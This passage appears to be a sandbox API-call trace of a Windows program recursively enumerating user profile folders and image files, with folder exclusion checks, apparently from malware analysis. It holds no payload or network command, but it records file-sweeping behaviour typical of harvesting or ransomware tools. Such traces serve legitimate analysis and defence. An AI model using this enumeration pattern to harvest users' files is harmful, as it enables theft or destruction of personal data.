lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbef78b20, ftCreationTime.dwHighDateTime=0x1d5e1b2, ftLastAccessTime.dwLowDateTime=0x13eacf50, ftLastAccessTime.dwHighDateTime=0x1d5e31d, ftLastWriteTime.dwLowDateTime=0x13eacf50, ftLastWriteTime.dwHighDateTime=0x1d5e31d, nFileSizeHigh=0x0, nFileSizeLow=0xb4e0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Pw6nPSJwo.png", cAlternateFileName="PW6NPS~1.PNG")) returned 1 [0157.926] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac9aec00, ftCreationTime.dwHighDateTime=0x1d5dea2, ftLastAccessTime.dwLowDateTime=0x35a7ad10, ftLastAccessTime.dwHighDateTime=0x1d5e585, ftLastWriteTime.dwLowDateTime=0x35a7ad10, ftLastWriteTime.dwHighDateTime=0x1d5e585, nFileSizeHigh=0x0, nFileSizeLow=0x18b97, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="qiez.png", cAlternateFileName="")) returned 1 [0157.926] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x525098e0, ftCreationTime.dwHighDateTime=0x1d5dd7a, ftLastAccessTime.dwLowDateTime=0xf1e50b30, ftLastAccessTime.dwHighDateTime=0x1d5df13, ftLastWriteTime.dwLowDateTime=0xf1e50b30, ftLastWriteTime.dwHighDateTime=0x1d5df13, nFileSizeHigh=0x0, nFileSizeLow=0x176ff, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="QS5wBgJkU5.bmp", cAlternateFileName="QS5WBG~1.BMP")) returned 1 [0157.926] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a73a50, ftCreationTime.dwHighDateTime=0x1d5e3c6, ftLastAccessTime.dwLowDateTime=0x11687980, ftLastAccessTime.dwHighDateTime=0x1d5dc33, ftLastWriteTime.dwLowDateTime=0x11687980, ftLastWriteTime.dwHighDateTime=0x1d5dc33, nFileSizeHigh=0x0, nFileSizeLow=0x26c2, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="rULw.png", cAlternateFileName="")) returned 1 [0157.927] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6d69370, ftCreationTime.dwHighDateTime=0x1d5d92b, ftLastAccessTime.dwLowDateTime=0xa1f44280, ftLastAccessTime.dwHighDateTime=0x1d5e558, ftLastWriteTime.dwLowDateTime=0xa1f44280, ftLastWriteTime.dwHighDateTime=0x1d5e558, nFileSizeHigh=0x0, nFileSizeLow=0x4969, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="uPfzg.bmp", cAlternateFileName="")) returned 1 [0157.927] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9489db00, ftCreationTime.dwHighDateTime=0x1d5df5e, ftLastAccessTime.dwLowDateTime=0x82a6dc10, ftLastAccessTime.dwHighDateTime=0x1d5dc77, ftLastWriteTime.dwLowDateTime=0x82a6dc10, ftLastWriteTime.dwHighDateTime=0x1d5dc77, nFileSizeHigh=0x0, nFileSizeLow=0xa046, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="x6Gb.png", cAlternateFileName="")) returned 1 [0157.928] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x1560056, ftCreationTime.dwLowDateTime=0x4d39, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x15, ftLastWriteTime.dwHighDateTime=0x1420057, nFileSizeHigh=0x4d39, nFileSizeLow=0x9073a0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="x6\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.928] FindClose (in: hFindFile=0x90afd8 | out: hFindFile=0x90afd8) returned 1 [0157.929] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe51b8690, ftCreationTime.dwHighDateTime=0x1d5dfc7, ftLastAccessTime.dwLowDateTime=0x1a5beaa0, ftLastAccessTime.dwHighDateTime=0x1d5d9e4, ftLastWriteTime.dwLowDateTime=0x1a5beaa0, ftLastWriteTime.dwHighDateTime=0x1d5d9e4, nFileSizeHigh=0x0, nFileSizeLow=0xa27d, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="f2JFy_.jpg", cAlternateFileName="")) returned 1 [0157.929] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324b5d80, ftCreationTime.dwHighDateTime=0x1d5e326, ftLastAccessTime.dwLowDateTime=0x4c7f4730, ftLastAccessTime.dwHighDateTime=0x1d5df38, ftLastWriteTime.dwLowDateTime=0x4c7f4730, ftLastWriteTime.dwHighDateTime=0x1d5df38, nFileSizeHigh=0x0, nFileSizeLow=0x8697, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="QMJeO8.gif", cAlternateFileName="")) returned 1 [0157.929] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcca756f0, ftCreationTime.dwHighDateTime=0x1d5e4b5, ftLastAccessTime.dwLowDateTime=0x4016bd20, ftLastAccessTime.dwHighDateTime=0x1d5dba0, ftLastWriteTime.dwLowDateTime=0x4016bd20, ftLastWriteTime.dwHighDateTime=0x1d5dba0, nFileSizeHigh=0x0, nFileSizeLow=0x1720a, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="rcuM7uLGY1kXH5mCjrE6.bmp", cAlternateFileName="RCUM7U~1.BMP")) returned 1 [0157.929] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60b46d40, ftCreationTime.dwHighDateTime=0x1d5de1e, ftLastAccessTime.dwLowDateTime=0x8e2aef50, ftLastAccessTime.dwHighDateTime=0x1d5e38d, ftLastWriteTime.dwLowDateTime=0x8e2aef50, ftLastWriteTime.dwHighDateTime=0x1d5e38d, nFileSizeHigh=0x0, nFileSizeLow=0x2cc4, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="tiM2iA.jpg", cAlternateFileName="")) returned 1 [0157.929] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1ac7960, ftCreationTime.dwHighDateTime=0x1d5e3d1, ftLastAccessTime.dwLowDateTime=0x6fbebf20, ftLastAccessTime.dwHighDateTime=0x1d5dac2, ftLastWriteTime.dwLowDateTime=0x6fbebf20, ftLastWriteTime.dwHighDateTime=0x1d5dac2, nFileSizeHigh=0x0, nFileSizeLow=0x3ead, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="ufXfgc_LQhg.png", cAlternateFileName="UFXFGC~1.PNG")) returned 1 [0157.929] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x641db40, ftCreationTime.dwHighDateTime=0x1d5e120, ftLastAccessTime.dwLowDateTime=0x8da1e520, ftLastAccessTime.dwHighDateTime=0x1d5dd2a, ftLastWriteTime.dwLowDateTime=0x8da1e520, ftLastWriteTime.dwHighDateTime=0x1d5dd2a, nFileSizeHigh=0x0, nFileSizeLow=0x542a, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="_jWe.png", cAlternateFileName="")) returned 1 [0157.929] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0xf40067, ftCreationTime.dwLowDateTime=0x4d9f, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0xea0068, nFileSizeHigh=0x4d9f, nFileSizeLow=0x909410, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="_j\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.929] FindClose (in: hFindFile=0x90af18 | out: hFindFile=0x90af18) returned 1 [0157.930] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd54bd6e0, ftCreationTime.dwHighDateTime=0x1d5dc96, ftLastAccessTime.dwLowDateTime=0x4b84be50, ftLastAccessTime.dwHighDateTime=0x1d5d858, ftLastWriteTime.dwLowDateTime=0x4b84be50, ftLastWriteTime.dwHighDateTime=0x1d5d858, nFileSizeHigh=0x0, nFileSizeLow=0x158e9, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="ITYvcRMYOFcy 0-.png", cAlternateFileName="ITYVCR~1.PNG")) returned 1 [0157.930] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23400e00, ftCreationTime.dwHighDateTime=0x1d5e310, ftLastAccessTime.dwLowDateTime=0xe7155b40, ftLastAccessTime.dwHighDateTime=0x1d5e5dc, ftLastWriteTime.dwLowDateTime=0xe7155b40, ftLastWriteTime.dwHighDateTime=0x1d5e5dc, nFileSizeHigh=0x0, nFileSizeLow=0x103c4, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="oNhYsixG5vZ 1mhk2TaA.jpg", cAlternateFileName="ONHYSI~1.JPG")) returned 1 [0157.930] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17de1ac0, ftCreationTime.dwHighDateTime=0x1d5da23, ftLastAccessTime.dwLowDateTime=0x8f3abf20, ftLastAccessTime.dwHighDateTime=0x1d5e431, ftLastWriteTime.dwLowDateTime=0x8f3abf20, ftLastWriteTime.dwHighDateTime=0x1d5e431, nFileSizeHigh=0x0, nFileSizeLow=0x1270a, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="OV_bHLK.gif", cAlternateFileName="")) returned 1 [0157.930] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cfdcdb0, ftCreationTime.dwHighDateTime=0x1d5e4d7, ftLastAccessTime.dwLowDateTime=0xf6dd40e0, ftLastAccessTime.dwHighDateTime=0x1d5e2b9, ftLastWriteTime.dwLowDateTime=0xf6dd40e0, ftLastWriteTime.dwHighDateTime=0x1d5e2b9, nFileSizeHigh=0x0, nFileSizeLow=0xc3db, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="qdzhTNRtUaAFIidK.bmp", cAlternateFileName="QDZHTN~1.BMP")) returned 1 [0157.930] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950c5350, ftCreationTime.dwHighDateTime=0x1d5de5f, ftLastAccessTime.dwLowDateTime=0xf3d6a560, ftLastAccessTime.dwHighDateTime=0x1d5e1ad, ftLastWriteTime.dwLowDateTime=0xf3d6a560, ftLastWriteTime.dwHighDateTime=0x1d5e1ad, nFileSizeHigh=0x0, nFileSizeLow=0x7498, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="xsLu.jpg", cAlternateFileName="")) returned 1 [0157.930] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3be77fc0, ftCreationTime.dwHighDateTime=0x1d5e67f, ftLastAccessTime.dwLowDateTime=0xf87ced70, ftLastAccessTime.dwHighDateTime=0x1d5e385, ftLastWriteTime.dwLowDateTime=0xf87ced70, ftLastWriteTime.dwHighDateTime=0x1d5e385, nFileSizeHigh=0x0, nFileSizeLow=0x11ae2, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="zvOG.jpg", cAlternateFileName="")) returned 1 [0157.930] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x1140078, ftCreationTime.dwLowDateTime=0x4e05, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x12a0079, nFileSizeHigh=0x4e05, nFileSizeLow=0x9b9d48, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="zv\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.930] FindClose (in: hFindFile=0x90ae58 | out: hFindFile=0x90ae58) returned 1 [0157.930] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8a7560, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0157.930] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PrintHood", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0157.934] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.934] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x7738e0d2, ftCreationTime.dwLowDateTime=0x9ba750, ftCreationTime.dwHighDateTime=0x60, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x9ba00e, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x86c028c, nFileSizeHigh=0x4810, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0xffffffff [0157.934] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8a7560, cFileName="Recent", cAlternateFileName="")) returned 1 [0157.935] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Recent", cchCount1=6, lpString2="AppData", cchCount2=7) returned 3 [0157.935] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.935] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x7738e0d2, ftCreationTime.dwLowDateTime=0x9ba720, ftCreationTime.dwHighDateTime=0x50, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x9ba00e, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x86c028c, nFileSizeHigh=0x483a, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0xffffffff [0157.935] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x87ed94, dwReserved1=0x8a7560, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0157.935] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Saved Games", cchCount1=11, lpString2="AppData", cchCount2=7) returned 3 [0157.935] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.935] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90ae58 [0157.935] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.936] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0157.936] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x1180078, ftCreationTime.dwLowDateTime=0x4eb6, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0xf, ftLastWriteTime.dwHighDateTime=0xfe0079, nFileSizeHigh=0x4eb6, nFileSizeLow=0x909410, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="햠ⴢ\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.936] FindClose (in: hFindFile=0x90ae58 | out: hFindFile=0x90ae58) returned 1 [0157.936] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="Searches", cAlternateFileName="")) returned 1 [0157.936] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Searches", cchCount1=8, lpString2="AppData", cchCount2=7) returned 3 [0157.937] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.937] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90ae58 [0157.939] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.939] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0157.939] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0157.939] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0157.939] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0xfe0078, ftCreationTime.dwLowDateTime=0x4f19, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0xdc0079, nFileSizeHigh=0x4f19, nFileSizeLow=0x909410, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="In\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.939] FindClose (in: hFindFile=0x90ae58 | out: hFindFile=0x90ae58) returned 1 [0157.940] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8a7560, cFileName="SendTo", cAlternateFileName="")) returned 1 [0157.940] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SendTo", cchCount1=6, lpString2="AppData", cchCount2=7) returned 3 [0157.940] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.940] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x7738e0d2, ftCreationTime.dwLowDateTime=0x9ba720, ftCreationTime.dwHighDateTime=0x50, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x9ba00e, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x85a028c, nFileSizeHigh=0x48da, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0xffffffff [0157.940] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8a7560, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0157.941] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Start Menu", cchCount1=10, lpString2="AppData", cchCount2=7) returned 3 [0157.944] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.944] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x7738e0d2, ftCreationTime.dwLowDateTime=0x9ba750, ftCreationTime.dwHighDateTime=0x60, ftLastAccessTime.dwLowDateTime=0x1, 